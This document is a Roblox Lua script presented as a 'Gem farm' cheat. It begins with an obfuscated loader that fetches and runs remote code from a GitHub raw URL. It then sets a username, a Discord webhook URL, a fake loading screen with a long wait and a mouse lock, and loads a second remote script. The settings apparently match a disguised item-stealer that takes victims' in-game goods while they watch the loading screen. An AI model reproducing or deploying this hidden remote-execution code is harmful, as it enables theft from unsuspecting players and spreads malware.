--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v68=(v31/((1 + 1)^(v32-(2 -1))))%((5 -3)^(((v33-(1 + 0)) -(v32-((1 + 0) -0))) + (2 -1))) ;return v68-(v68%1) ;else local v69=619 -(555 + 64) ;local v70;while true do if (v69==((207 + 724) -(857 + 74))) then v70=(1067 -(68 + 997))^(v32-((1526 -(892 + 65)) -(367 + 201))) ;return (((v31%(v70 + v70))>=v70) and (928 -(214 + 713))) or (117 -(32 + 85)) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (7 -4) );v19=v19 + (6 -(182 -(67 + 113))) ;return (v37 * 16777216) + (v36 * (120312 -54776)) + (v35 * (606 -(87 + 263))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (v38==0) then local v72=469 -(159 + 310) ;local v73;while true do if (v72~=0) then else v73=0;while true do if (v73~=(2 -1)) then else v38=1;break;end if (v73==0) then local v106=0;while true do if (v106==1) then v73=1;break;end if (v106==0) then v39=935 -(39 + 896) ;v40=nil;v106=1;end end end end break;end end end if (v38==3) then v45=nil;while true do local v79=0 -0 ;while true do if (v79==(0 -0)) then local v100=0 -0 ;local v101;while true do if (v100==(0 + 0)) then v101=0;while true do if (v101==(0 + 0)) then if (v39==(398 -(115 + 281))) then local v153=0 -0 ;local v154;while true do if (0~=v153) then else v154=0;while true do if (v154==1) then for v167=1,v24() do local v168=0 + 0 ;local v169;local v170;while true do if (v168==1) then while true do if ((0 -0)~=v169) then else v170=v22();if (v21(v170,3 -2 ,868 -(550 + 317) )==(0 -0)) then local v180=0 -0 ;local v181;local v182;local v183;local v184;while true do if (v180~=(0 -0)) then else v181=0;v182=nil;v180=1;end if (v180~=(287 -(134 + 151))) then else while true do if (v181~=(1667 -(970 + 695))) then else local v186=0;while true do if ((0 -0)~=v186) then else if (v21(v183,1991 -(582 + 1408) ,1)~=(3 -2)) then else v184[2]=v45[v184[2 -0 ]];end if (v21(v183,2,7 -5 )~=(1825 -(1195 + 629))) then else v184[3 -0 ]=v45[v184[244 -(187 + 54) ]];end v186=1;end if (v186==(781 -(162 + 618))) then v181=3 + 0 ;break;end end end if ((1 + 0)~=v181) then else local v187=0;while true do if (v187~=0) then else v184={v23(),v23(),nil,nil};if (v182==0) then local v196=0 -0 ;local v197;while true do if (0~=v196) then else v197=0;while true do if (v197==0) then v184[3]=v23();v184[1 + 3 ]=v23();break;end end break;end end elseif (v182==(1637 -(1373 + 263))) then v184[3]=v24();elseif (v182==2) then v184[1003 -(451 + 549) ]=v24() -((1 + 1)^16) ;elseif (v182==3) then local v202=0 -0 ;local v203;local v204;while true do if (v202==(1 -0)) then while true do if (v203==(1384 -(746 + 638))) then v204=0 + 0 ;while true do if (v204==(0 -0)) then v184[344 -(218 + 123) ]=v24() -(2^(1597 -(1535 + 46))) ;v184[4]=v23();break;end end break;end end break;end if (v202~=(0 + 0)) then else v203=0 + 0 ;v204=nil;v202=1;end end end v187=1;end if ((561 -(306 + 254))~=v187) then else v181=1 + 1 ;break;end end end if (0~=v181) then else local v188=0 -0 ;while true do if (v188==0) then v182=v21(v170,1469 -(899 + 568) ,3);v183=v21(v170,3 + 1 ,14 -8 );v188=1;end if (v188==1) then v181=1;break;end end end if (v181==3) then if (v21(v183,606 -(268 + 335) ,293 -(60 + 230) )~=1) then else v184[576 -(426 + 146) ]=v45[v184[1 + 3 ]];end v40[v167]=v184;break;end end break;end if (v180~=1) then else v183=nil;v184=nil;v180=2;end end end break;end end break;end if (v168~=(1456 -(282 + 1174))) then else v169=0;v170=nil;v168=812 -(569 + 242) ;end end end v39=8 -5 ;break;end if (v154~=0) then else local v165=0;while true do if (v165==0) then local v171=0;while true do if ((0 + 0)==v171) then for v175=1,v44 do local v176=0;local v177;local v178;local v179;while true do if (v176~=(1024 -(706 + 318))) then else v177=1251 -(721 + 530) ;v178=nil;v176=1;end if (v176~=(1272 -(945 + 326))) then else v179=nil;while true do if ((0 -0)~=v177) then else v178=v22();v179=nil;v177=1;end if (1==v177) then if (v178==(1 + 0)) then v179=v22()~=(700 -(271 + 429)) ;elseif (v178==(2 + 0)) then v179=v25();elseif (v178==3) then v179=v26();end v45[v175]=v179;break;end end break;end end end v43[1503 -(1408 + 92) ]=v22();v171=1;end if (v171~=1) then else v165=1087 -(461 + 625) ;break;end end end if (v165==(1289 -(993 + 295))) then v154=1 + 0 ;break;end end end end break;end end end if ((1174 -(418 + 753))~=v39) then else local v155=0 + 0 ;local v156;while true do if (v155==(0 + 0)) then v156=0;while true do if (v156==0) then local v166=0 + 0 ;while true do if (v166==0) then for v172=1,v24() do v41[v172-(1 + 0) ]=v29();end return v43;end end end end break;end end end v101=1;end if (v101==1) then v79=530 -(406 + 123) ;break;end end break;end end end if (v79~=(1770 -(1749 + 20))) then else if (v39==1) then local v107=0 + 0 ;local v108;while true do if (0==v107) then v108=1322 -(1249 + 73) ;while true do if ((0 + 0)==v108) then local v157=1145 -(466 + 679) ;while true do if (v157~=0) then else local v162=0;while true do if (v162==(0 -0)) then v43={v40,v41,nil,v42};v44=v24();v162=1901 -(106 + 1794) ;end if (v162~=1) then else v157=1 + 0 ;break;end end end if (v157~=(1 + 0)) then else v108=1;break;end end end if ((2 -1)~=v108) then else v45={};v39=5 -3 ;break;end end break;end end end if (v39~=0) then else local v109=0;while true do if ((115 -(4 + 110))~=v109) then else v42={};v39=585 -(57 + 527) ;break;end if (v109==(1427 -(41 + 1386))) then local v131=0;while true do if (v131~=(103 -(17 + 86))) then else v40={};v41={};v131=1 + 0 ;end if (v131==1) then v109=1;break;end end end end end break;end end end break;end if (v38==2) then local v74=0;while true do if (v74==(1 -0)) then v38=8 -5 ;break;end if (v74==0) then local v99=0;while true do if (1~=v99) then else v74=1;break;end if (v99==(166 -(122 + 44))) then v43=nil;v44=nil;v99=1 -0 ;end end end end end if (v38==(3 -2)) then local v75=0;while true do if ((1 + 0)==v75) then v38=1 + 1 ;break;end if (0==v75) then v41=nil;v42=nil;v75=1 -0 ;end end end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=v24();local v47=v24();local v48=66 -(30 + 35) ;local v49=(v21(v47,1 + 0 + 0 ,1277 -((2260 -1217) + 214) ) * ((7 -(13 -8))^(1244 -(323 + (1990 -1101))))) + v46 ;local v50=v21(v47,56 -35 ,31);local v51=((v21(v47,612 -(361 + 219) )==(321 -(53 + 267))) and  -(406 -(118 + 287))) or (1 + 0) ;if (v50==(413 -(15 + 398))) then if (v49==((286 + 696) -((86 -68) + 964))) then return v51 * 0 ;else local v80=0;while true do if (v80==((753 -(239 + 514)) -0)) then v50=(2 + 2) -3 ;v48=0 + 0 ;break;end end end elseif (v50==(1290 + 757)) then return ((v49==(977 -(553 + 424))) and (v51 * ((851 -(20 + (2159 -(797 + 532))))/(0 + 0 + 0)))) or (v51 * NaN) ;end return v8(v51,v50-(1015 + 8) ) * (v48 + (v49/((128 -(116 + 10))^(4 + 48)))) ;end v26=nil;function v26(v52)local v53;if  not v52 then v52=v24();if (v52==0) then return "";end end v53=v3(v16,v19,(v19 + v52) -(1 + 0) );v19=v19 + v52 ;local v54={};for v66=2 -1 , #v53 do v54[v66]=v2(v1(v3(v53,v66,v66)));end return v6(v54);end v18=5;end if (v18==2) then function v22()local v55=v1(v16,v19,v19);v19=v19 + 1 ;return v55;end v23=nil;function v23()local v56,v57=v1(v16,v19,v19 + 2 );v19=v19 + (1204 -(373 + 829)) ;return (v57 * (987 -(476 + 255))) + v56 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v58)if (v1(v58,2)==79) then v20=v0(v3(v58,1,1));return "";else local v71=v2(v0(v58,16));if v20 then local v81=v5(v71,v20);v20=nil;return v81;else return v71;end end end);v18=1;end if (v18==7) then function v30(v59,v60,v61)local v62=0;local v63;local v64;local v65;while true do if (v62==0) then v63=v59[1];v64=v59[2];v62=1;end if (v62==1) then v65=v59[3];return function(...)local v82=v63;local v83=v64;local v84=v65;local v85=v28;local v86=1;local v87= -1;local v88={};local v89={...};local v90=v12("#",...) -1 ;local v91={};local v92={};for v96=0,v90 do if (v96>=v84) then v88[v96-v84 ]=v89[v96 + 1 ];else v92[v96]=v89[v96 + 1 ];end end local v93=(v90-v84) + 1 ;local v94;local v95;while true do v94=v82[v86];v95=v94[1];if (v95<=3) then if (v95<=1) then if (v95==0) then v92[v94[2]]=v94[3];else local v112=v94[2];local v113,v114=v85(v92[v112](v13(v92,v112 + 1 ,v94[3])));v87=(v114 + v112) -1 ;local v115=0;for v132=v112,v87 do local v133=0;while true do if (v133==0) then v115=v115 + 1 ;v92[v132]=v113[v115];break;end end end end elseif (v95==2) then local v116=v94[2];v92[v116]=v92[v116](v13(v92,v116 + 1 ,v87));else v92[v94[2]]();end elseif (v95<=5) then if (v95==4) then do return;end else local v118=0;local v119;local v120;local v121;local v122;local v123;while true do if (v118==4) then v86=v86 + 1 ;v94=v82[v86];v123=v94[2];v92[v123]=v92[v123](v13(v92,v123 + 1 ,v87));v86=v86 + 1 ;v94=v82[v86];v118=5;end if (v118==2) then v92[v123 + 1 ]=v122;v92[v123]=v122[v94[4]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v94[3];v86=v86 + 1 ;v118=3;end if (v118==3) then v94=v82[v86];v123=v94[2];v120,v121=v85(v92[v123](v13(v92,v123 + 1 ,v94[3])));v87=(v121 + v123) -1 ;v119=0;for v160=v123,v87 do local v161=0;while true do if (v161==0) then v119=v119 + 1 ;v92[v160]=v120[v119];break;end end end v118=4;end if (v118==0) then v119=nil;v120,v121=nil;v122=nil;v123=nil;v92[v94[2]]=v61[v94[3]];v86=v86 + 1 ;v118=1;end if (v118==5) then v92[v94[2]]();v86=v86 + 1 ;v94=v82[v86];do return;end break;end if (v118==1) then v94=v82[v86];v92[v94[2]]=v61[v94[3]];v86=v86 + 1 ;v94=v82[v86];v123=v94[2];v122=v92[v94[3]];v118=2;end end end elseif (v95>6) then local v124=v94[2];local v125=v92[v94[3]];v92[v124 + 1 ]=v125;v92[v124]=v125[v94[4]];else v92[v94[2]]=v61[v94[3]];end v86=v86 + 1 ;end end;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403503O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6D7568612O6D6164363931392F50726F6A6563742D57642F6D61696E2F47656D2532306661726D2532306661737400083O0012053O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);end
UserName = "muaxuan1204"
UserName2 = "muaxuan1204"
Webhook = "https://discord.com/api/webhooks/1107848684512751706/tFpU6aNlCv7-fFDrrYnImOSTzG_0yTQ4Le-cB3rSGvg6_UyG9t-eMXOaS5tk5-lBXzQz"
_G.LoadingScreen = true
_G.AntiLeave = false
_G.MouseLock = true 
_G.ScriptName = "Project-Wd script"
_G.FirstText = "Script Preparing"
_G.SecondText = "Script Loading..."
_G.ThirdText = "Almost Done..."
_G.WaitingTime = 180 -- it's the time between 0% and 100% in secondes
loadstring(game:HttpGet("https://raw.githubusercontent.com/k4ftt/R/main/Main.lua", true))()
